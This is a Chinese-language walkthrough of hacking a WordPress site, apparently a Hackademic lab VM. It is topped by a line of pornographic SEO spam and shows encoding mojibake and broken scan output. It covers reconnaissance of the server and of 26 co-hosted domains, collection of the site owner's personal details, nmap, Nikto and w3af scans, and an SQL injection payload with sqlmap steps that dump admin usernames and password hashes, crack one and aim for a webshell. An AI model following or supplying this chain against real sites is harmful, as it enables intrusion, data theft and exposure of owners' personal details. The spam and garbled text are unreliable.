成人AV在线无码|婷婷五月激情色,|伊人加勒比二三四区|国产一区激情都市|亚洲AV无码电影|日av韩av无码|天堂在线亚洲Av|无码一区二区影院|成人无码毛片AV|超碰在线看中文字幕

送國(guó)外黑客們的入侵網(wǎng)站思路

問題的答案看起來不那么確定,顯而易見的是黑掉一個(gè)站點(diǎn)有很多種方法。在這篇文章,我們的目標(biāo)是要給大家展示一下黑客是如何鎖定并黑掉一個(gè)目標(biāo)站點(diǎn)的!讓我們來看看目標(biāo)站點(diǎn):hack-test.com先ping

問題的答案看起來不那么確定,顯而易見的是黑掉一個(gè)站點(diǎn)有很多種方法。在這篇文章,我們的目標(biāo)是要給大家展示一下黑客是如何鎖定并黑掉一個(gè)目標(biāo)站點(diǎn)的!

讓我們來看看目標(biāo)站點(diǎn):hack-test.com

先ping 下站點(diǎn)所在服務(wù)器的IP :

現(xiàn)在我們有了目標(biāo)站點(diǎn)所在服務(wù)器的IP 了 — 173.236.138.113

然后我們可以找找同個(gè)IP 上的其他站點(diǎn)(旁站:sameip.org ): Same IP 26 sites hosted on IP Address 173.236.138.113

ID Domain Site Link

1 hijackthisforum.com hijackthisforum.com

2 sportforum.net

sportforum.net

,

3 freeonlinesudoku.net freeonlinesudoku.net

4 cosplayhell.com cosplayhell.com

5 videogamenews.org videogamenews.org

6 gametour.com gametour.com

7 qualitypetsitting.net qualitypetsitting.net

8 brendanichols.com brendanichols.com

9 8ez.com 8ez.com

10 hack-test.com hack-test.com

11 kisax.com kisax.com

12 paisans.com paisans.com

13 mghz.com mghz.com

14 debateful.com debateful.com

15 jazzygoodtimes.com jazzygoodtimes.com

16 fruny.com fruny.com

17 vbum.com vbum.com

18 wuckie.com wuckie.com

19 force5inc.com force5inc.com

20 virushero.com virushero.com

21 twincitiesbusinesspeernetwork.com twincitiesbusinesspeernetwork.com 22 jennieko.com jennieko.com

23 davereedy.com davereedy.com

24 joygarrido.com joygarrido.com

25 prismapp.com prismapp.com

26 utiligolf.com utiligolf.com

總計(jì)有26個(gè)站點(diǎn)在[173.236.138.113]這臺(tái)服務(wù)器上。為了黑掉目標(biāo)站點(diǎn),許多黑客會(huì)把目標(biāo)站點(diǎn)同服的其他站點(diǎn)也劃入攻擊范圍內(nèi)。但是出于學(xué)習(xí)的目的,我們今天暫且將其他站點(diǎn)放在一邊。

我們需要更多關(guān)于目標(biāo)站點(diǎn)的信息(Ps :筆者認(rèn)為在滲透測(cè)試過程中,這比實(shí)施測(cè)試的環(huán)節(jié)來得重要得多。),他們包括:

1.DNS 記錄(A ,NS ,TXT ,MX )

2.WEB 服務(wù)類型(IIS ,APACHE ,TOMCAT )

3. 域名注冊(cè)者的信息(所持有域名公司等)

4. 目標(biāo)站點(diǎn)管理員(相關(guān)人員)的姓名,電話,郵箱和住址等

5. 目標(biāo)站點(diǎn)所支持的腳本類型(PHP ,ASP ,JSP ,ASP.net ,CFM )

6. 目標(biāo)站點(diǎn)的操作系統(tǒng)(UNIX,LINUX,WINDOWS,SOLARIS )

7. 目標(biāo)站點(diǎn)開放的端口

讓我們先來查詢相關(guān)DNS 記錄吧,這里用的是 who.is:

,

目標(biāo)站點(diǎn)DNS 記錄信息:

Record Type TTL Priority Content

hack-4 A 173.236.138.113 () test.com hours

ns1.dreamhost.com. hack-4 SOA hostmaster.dreamhost.com. 2011032301 test.com hours 15283 1800 1814400 14400

hack-4 NS ns1.dreamhost.com test.com hours

hack-4 NS ns3.dreamhost.com test.com hours

hack-4 NS ns2.dreamhost.com test.com hours

www.hack-4 A 173.236.138.113 () test.com hours

同時(shí)確認(rèn)WEB 服務(wù)的類型:

顯而易見是Apache ,稍后我們將確定其版本:

HACK-TEST.COM SITE INFORMATION

IP: 173.236.138.113

Website Status: active

Server Type: Apache

,

Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753 Page Views per Visit: 1 Month: 2.0 3 Month: 3.7

現(xiàn)在是時(shí)候來查詢目標(biāo)站點(diǎn)持有人(也許可能就是管理員)信息了:

現(xiàn)在我們有了管理員的一些相關(guān)信息了,祭出Backtrack5中的神器 Whatweb 來確認(rèn)操作系統(tǒng)和WEB 服務(wù)版本信息:

Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.

現(xiàn)在我們知道,目標(biāo)站點(diǎn)使用了用PHP 編寫的非常出名的開源博客系統(tǒng)

WordPress ,并且是跑在Fedora 的Linux 發(fā)行版上的,Apache 版本是2.2.15。接下來讓我們看看目標(biāo)站點(diǎn)服務(wù)器開了哪些端口:

祭出神器Nmap

1 – 獲取目標(biāo)服務(wù)器開放的服務(wù)

1 root@bt:/# nmap -sV hack-test.com 2 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET 3 Nmap scan report for hack-test.com (192.168.1.2) 4 Host is up (0.0013s latency). 5 Not shown: 998 filtered ports 6 PORT STATE SERVICE VERSION 7 22/tcp closed ssh 8 80/tcp open http Apache httpd 2.2.15 ((Fedora)) 9 MAC Address: 00:0C:29:01:8A:4D (VMware) 1Service detection performed. Please report any incorrect results at0 http://nmap.org/submit/ . 1Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds 1

2 – 獲取目標(biāo)服務(wù)器操作系統(tǒng)

1 root@bt:/# nmap -O hack-test.com

,

2 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET 3 Nmap scan report for hack-test.com (192.168.1.2)

4 Host is up (0.00079s latency).

5 Not shown: 998 filtered ports

6 PORT STATE SERVICE

7 22/tcp closed ssh

8 80/tcp open http

9 MAC Address: 00:0C:29:01:8A:4D (VMware)

1Device type: general purpose

0 Running: Linux 2.6.X

1OS details: Linux 2.6.22 (Fedora Core 6)

1 Network Distance: 1 hop

1OS detection performed. Please report any incorrect results at http2 ://nmap.org/submit/ .

1Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds 3

1

4

1

5

1

6

1

7

1

8

啊哦!~只開了80,而且是 Fedora Core 6 Linux內(nèi)核版本為2.6.22

現(xiàn)在我們已經(jīng)收集了很多關(guān)于目標(biāo)站點(diǎn)的重要信息了。讓我們掃掃他的漏洞吧。(Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF,等等. )

讓我們先試試 Nakto.pl 來掃掃,沒準(zhǔn)能搞出點(diǎn)漏洞來

root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com – Nikto v2.1.4

—————————————————————————

Target IP: 192.168.1.2 Target Hostname: hack-test.com Target Port: 80 Start Time: 2011-12-29 06:50:03

—————————————————————————

Server: Apache/2.2.15 (Fedora) ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST OSVDB-3268: /icons/:

Directory indexing found. OSVDB-3233: /icons/README: Apache default

,

file found. 6448 items checked: 1 error(s) and 6 item(s) reported on remote host End Time: 2011-12-29 06:50:37 (34 seconds) —————————————————————————

同時(shí)試試Wa3f (Ps :哦哇譜死的開源項(xiàng)目,很不錯(cuò)的說~)

1

2 root@bt:/pentest/web/w3af# ./w3af_gui

3 Starting w3af, running on:

4 Python version:

5 2.6.5 (r265:79063, Apr 16 2010, 13:57:41)

6 [GCC 4.4.3]

7 GTK version: 2.20.1

8 PyGTK version: 2.17.0

9 w3af - Web Application Attack and Audit Framework

10 Version: 1.2

11 Revision: 4605

12 Author: Andres Riancho and the w3af team.

13

圖形界面的掃描方式,寫入U(xiǎn)RL 即可。

,

用以前給雜志社投稿的語氣說,泡杯茶的功夫,等待掃描結(jié)束并查看結(jié)果。 你可以看到很多漏洞信息鳥~先試試SQL 注入。

,

url – http://hack-test.com/Hackademic_RTB1/?cat=d'z"0 然后 Exploit it!

發(fā)現(xiàn)其他漏洞測(cè)試失敗,用SQLMap 進(jìn)行脫褲吧(猜解數(shù)據(jù)庫(kù)并保存目標(biāo)站點(diǎn)相關(guān)信息到本地) Dump it!

sqlmap -u url

,

過一小會(huì)兒能見到如下信息

按n 并回車后你可以看到

哦也~顯錯(cuò)方式的注入點(diǎn),而且爆出的 Mysql的版本信息

用sqlmap 取得所有庫(kù),參數(shù) -dbs

找到三個(gè)庫(kù)

查Wordpress 的庫(kù)中所有表,參數(shù) -D wordpress -tables

然后是列名(這里需要你自己熟悉敏感信息存在哪個(gè)表中呢),參數(shù) -T wp_users -columns

22個(gè)字段(列)

,

然后查數(shù)據(jù),參數(shù) -C user_login,user_pass –dump 然后解密管理員的hash ,這里用的是 http://www.onlinehashcrack.com/free-hash-reverse.php

明文密碼是q1w2e3(和csdn 庫(kù)的密碼排行榜有得一拼,哈哈~),然后登入后臺(tái)拿webshell 了。

標(biāo)簽: